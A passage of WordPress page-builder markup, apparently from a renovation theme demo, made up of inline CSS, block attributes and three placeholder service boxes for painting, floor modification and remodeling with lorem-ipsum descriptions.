}\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Painting</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6a6f7893-59bb-4925-bdaa-e0b06bedc4e7\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"abb180d8-6220-4fbd-8b13-9b1a01abc33b\"} -->\n<style type=\"text/css\"> .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-abb180d8-6220-4fbd-8b13-9b1a01abc33b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"1dbb8474-65d4-483c-84d0-b75c10b9a9a0\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"5d2675a4-fe64-46db-a12e-a5099cf66e81\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Floor Modification</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"673b41df-9cb3-42e4-aa60-44dea2983a99\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-673b41df-9cb3-42e4-aa60-44dea2983a99\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"877dac13-99c6-40a9-9dd5-6fca441a57f3\"} -->\n<style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Remodeling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"b6bfc812-3413-49c0-a306-0ead7dc25f71\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div 